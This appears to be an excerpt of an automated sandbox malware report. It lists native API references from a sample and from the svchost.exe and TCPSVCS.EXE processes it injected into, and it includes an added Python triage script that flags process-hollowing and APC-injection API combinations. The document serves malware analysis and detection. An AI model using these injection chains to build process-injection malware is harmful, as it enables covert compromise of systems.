script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_630590d1-0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C5B3 NtClose,2_2_0042C5B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72B60 NtClose,LdrInitializeThunk,2_2_03A72B60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03A72DF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03A72C70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A735C0 NtCreateMutant,LdrInitializeThunk,2_2_03A735C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A74340 NtSetContextThread,2_2_03A74340
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A74650 NtSuspendThread,2_2_03A74650
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72BA0 NtEnumerateValueKey,2_2_03A72BA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72B80 NtQueryInformationFile,2_2_03A72B80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72BE0 NtQueryValueKey,2_2_03A72BE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72BF0 NtAllocateVirtualMemory,2_2_03A72BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72AB0 NtWaitForSingleObject,2_2_03A72AB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72AF0 NtWriteFile,2_2_03A72AF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72AD0 NtReadFile,2_2_03A72AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72FA0 NtQuerySection,2_2_03A72FA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72FB0 NtResumeThread,2_2_03A72FB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72F90 NtProtectVirtualMemory,2_2_03A72F90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72FE0 NtCreateFile,2_2_03A72FE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72F30 NtCreateSection,2_2_03A72F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72F60 NtCreateProcessEx,2_2_03A72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EA0 NtAdjustPrivilegesToken,2_2_03A72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E80 NtReadVirtualMemory,2_2_03A72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EE0 NtQueueApcThread,2_2_03A72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E30 NtWriteVirtualMemory,2_2_03A72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DB0 NtEnumerateKey,2_2_03A72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DD0 NtDelayExecution,2_2_03A72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D30 NtUnmapViewOfSection,2_2_03A72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D00 NtSetInformationFile,2_2_03A72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D10 NtMapViewOfSection,2_2_03A72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CA0 NtQueryInformationToken,2_2_03A72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CF0 NtOpenProcess,2_2_03A72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CC0 NtQueryVirtualMemory,2_2_03A72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C00 NtQueryInformationProcess,2_2_03A72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C60 NtCreateKey,2_2_03A72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73090 NtSetValueKey,2_2_03A73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73010 NtOpenDirectoryObject,2_2_03A73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A739B0 NtGetContextThread,2_2_03A739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D10 NtOpenProcessToken,2_2_03A73D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D70 NtOpenThread,2_2_03A73D70
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E04340 NtSetContextThread,LdrInitializeThunk,5_2_02E04340
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E04650 NtSuspendThread,LdrInitializeThunk,5_2_02E04650
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02AF0 NtWriteFile,LdrInitializeThunk,5_2_02E02AF0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02AD0 NtReadFile,LdrInitializeThunk,5_2_02E02AD0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02BE0 NtQueryValueKey,LdrInitializeThunk,5_2_02E02BE0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02E02BF0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_02E02BA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02B60 NtClose,LdrInitializeThunk,5_2_02E02B60
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02EE0 NtQueueApcThread,LdrInitializeThunk,5_2_02E02EE0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_02E02E80
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02FE0 NtCreateFile,LdrInitializeThunk,5_2_02E02FE0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02FB0 NtResumeThread,LdrInitializeThunk,5_2_02E02FB0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02F30 NtCreateSection,LdrInitializeThunk,5_2_02E02F30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_02E02CA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02C60 NtCreateKey,LdrInitializeThunk,5_2_02E02C60
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02E02C70
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02E02DF0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02DD0 NtDelayExecution,LdrInitializeThunk,5_2_02E02DD0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_02E02D30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02D10 NtMapViewOfSection,LdrInitializeThunk,5_2_02E02D10
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E035C0 NtCreateMutant,LdrInitializeThunk,5_2_02E035C0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E039B0 NtGetContextThread,LdrInitializeThunk,5_2_02E039B0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02AB0 NtWaitForSingleObject,5_2_02E02AB0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02B80 NtQueryInformationFile,5_2_02E02B80
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02EA0 NtAdjustPrivilegesToken,5_2_02E02EA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02E30 NtWriteVirtualMemory,5_2_02E02E30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02FA0 NtQuerySection,5_2_02E02FA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02F90 NtProtectVirtualMemory,5_2_02E02F90
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02F60 NtCreateProcessEx,5_2_02E02F60
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02CF0 NtOpenProcess,5_2_02E02CF0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02CC0 NtQueryVirtualMemory,5_2_02E02CC0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02C00 NtQueryInformationProcess,5_2_02E02C00
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02DB0 NtEnumerateKey,5_2_02E02DB0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E02D00 NtSetInformationFile,5_2_02E02D00
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E03090 NtSetValueKey,5_2_02E03090
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E03010 NtOpenDirectoryObject,5_2_02E03010
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E03D70 NtOpenThread,5_2_02E03D70
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E03D10 NtOpenProcessToken,5_2_02E03D10
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00159010 NtCreateFile,5_2_00159010
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00159170 NtReadFile,5_2_00159170
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00159260 NtDeleteFile,5_2_00159260
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00159300 NtClose,5_2_00159300
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00159450 NtAllocateVirtualMemory,5_2_00159450
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02A3F08B NtQueryInformationProcess,5_2_02A3F08B
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02A3F1BE NtReadVirtualMemory,5_2_02A3F1BE
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02A3F88D NtUnmapViewOfSection,5_2_02A3F88D
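The svchost.exe and TCPSVCS.EXE entries above are one-line wrappers around single Nt* calls at addresses (0x03A7xxxx, 0x02E0xxxx) well away from where the system ntdll image is loaded, i.e. a private stub table rather than application logic; reading that as the payload mapping its own copy of ntdll is an inference from the addresses, not something the report states. When triaging such a listing an analyst wants to know which process references which native APIs and whether the set covers a complete injection chain. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses "Code function" evidence lines in either the raw extraction form (no separator before "Code function", function id repeated after the API list) or the cleaned form, groups Nt*/Zw* names per source path and process index, and matches them against three API combinations. The combination-to-technique labels and the constructed sample (a dozen lines copied from the listing above) are the example's own assumptions.

```python
"""Triage helper for sandbox "Code function" evidence: group the native (Nt*/Zw*) APIs each
process references and flag injection-style API combinations.
Added example; not part of the Joe Sandbox report or its tooling."""
import re
from collections import defaultdict

# Constructed sample: a dozen lines copied from the report's listing, deliberately mixing the
# raw extraction form (no separator before "Code function", function id repeated at the end)
# with the cleaned form, so the parser is exercised on both.
SAMPLE_REPORT = r"""
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F30 NtCreateSection,2_2_03A72F30
Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A72D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A72D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A74340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A72EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A72E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A72FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A72CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A72B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_00159010 NtCreateFile
Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_00159170 NtReadFile
Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_00159260 NtDeleteFile
Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_005DBF400_2_005DBF40
"""

# Function ids look like "<process index>_<run>_<8 hex digit address>"; the fixed-width
# address is what lets the raw "0_2_005DBF400_2_005DBF40" form be split correctly.
LINE_RE = re.compile(
    r"Source:\s*(?P<src>.+?)\s*Code function:\s*"
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]{8})\s*(?P<rest>.*)$"
)

# API combinations this example treats as injection indicators when one process references
# all of them. The technique labels are the example's own mapping, not the report's.
PATTERNS = {
    "process hollowing (unmap, write, set context, resume)": {
        "NtUnmapViewOfSection", "NtWriteVirtualMemory", "NtSetContextThread", "NtResumeThread"},
    "APC injection (open process, write, queue APC)": {
        "NtOpenProcess", "NtWriteVirtualMemory", "NtQueueApcThread"},
    "section mapping into a process (create/map section, resume)": {
        "NtCreateSection", "NtMapViewOfSection", "NtResumeThread"},
}


def parse_line(line):
    """Return (source_path, function_id, [api names]) or None if the line is not evidence."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    src, fid, rest = m.group("src"), m.group("fid"), m.group("rest").strip()
    if rest.endswith(fid):          # raw form repeats the function id after the API list
        rest = rest[: -len(fid)]
    apis = [a.strip() for a in rest.split(",") if a.strip()]
    return src, fid, apis


def collect(report_text):
    """Map (source path, process index) -> set of native APIs referenced by that process."""
    per_proc = defaultdict(set)
    for line in report_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, fid, apis = parsed
        proc_idx = fid.split("_")[0]
        for api in apis:
            if api.startswith(("Nt", "Zw")):   # ignore non-native helpers such as LdrInitializeThunk
                per_proc[(src, proc_idx)].add(api)
    return dict(per_proc)


def match_patterns(per_proc):
    """Return {(source, process index): [names of PATTERNS fully covered by its API set]}."""
    hits = {}
    for key, apis in per_proc.items():
        matched = [name for name, needed in PATTERNS.items() if needed <= apis]
        if matched:
            hits[key] = matched
    return hits


if __name__ == "__main__":
    procs = collect(SAMPLE_REPORT)
    for (src, idx), apis in sorted(procs.items()):
        print(f"process {idx} {src}: {len(apis)} native APIs -> {', '.join(sorted(apis))}")
    for (src, idx), names in sorted(match_patterns(procs).items()):
        for name in names:
            print(f"  [!] process {idx} {src}: {name}")
```

On the sample this reports nine native APIs for svchost.exe (process 2), covering all three patterns, and none for the file-I/O-only TCPSVCS.EXE stubs. A static reference list shows what code is present, not what executed: a complete private copy of ntdll's stubs will satisfy every pattern, so treat a match as a prompt to confirm against the report's runtime behaviour signatures (writes into foreign process memory, APCs queued in another process, thread context changes) before naming the technique.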
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_0063D5EB CreateFileW,DeviceIoControl,CloseHandle
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_00631201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_0063E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_005DBF40
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_00642046
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_005D8060
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_00638298
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_0060E4FF
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_0060676B
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_00664873
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_005DCAF0
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_005FCAA0
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_005ECC39
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_00606DD9
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_005EB119
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_005D91C0
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_005F1394
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_005F1706
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_005F781B
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_005E997D
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_005D7920
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_005F19B0
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_005F7A4A
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_005F1C77
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_005F7CA7
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_0065BE44
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_00609EEE
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_005F1F32
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exe    Code function: 0_2_01A6B5E8
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_00418583
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_00403030
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_004010DC
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_0040E17C
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_0040E127
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_0040E133
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_004011C0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_0042EBA3
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_00402480
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_0040FDCB
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_0040FDD3
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_00402760
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_0041677E
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_0040DFE3
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_0040FFF3
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_00416783
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03B003E6
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AC02C0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AF41A2
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03B001AA
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AF81CC
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A30100
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AC8158
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A3C7C0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A64750
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A5C6E0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03B00591
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AEE4F6
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AE4420
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AF2446
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AF6BD7
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AFAB40
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03B0A9A6
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A268B8
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A6E8F0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A4A840
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A42840
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03ABEFA0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A4CFE0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A82F28
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A60F30
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AE2F30
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AB4F40
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A52E90
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AFCE93
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AFEEDB
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AFEE26
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A40E59
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A58DBF
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A3ADE0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A4AD00
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03ADCD1F
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AE0CB5
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A30CF2
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A40C00
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A8739A
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AF132D
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A2D34C
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A452A0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A4B1B0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A7516C
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03B0B16B
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AF70E9
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AFF0E0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AEF0CC
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AFF7B0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AF16CC
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A85630
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03ADD5B0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03B095C3
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AF7571
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AFF43F
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A31460
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A5FB80
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AB5BF0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A7DBF9
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AFFB76
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03ADDAAC
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A85AA0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AE1AA3
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AEDAC6
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AB3A6C
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AFFA49
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AF7A46
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AD5910
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A49950
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A5B950
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A438E0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AAD800
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AFFFB1
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A41F92
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A03FD2
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A03FD5
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AFFF09
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A49EB0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A5FDC0
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AF7D73
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03A43D40
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AF1D5A
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AFFCF2
                Source: C:\Windows\SysWOW64\svchost.exe    Code function: 2_2_03AB9C32
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E502C0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E70274
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E903E6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02DDE3F0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E8A352
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E62000
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E881CC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E901AA
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E841A2
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE    Code function: 5_2_02E58158
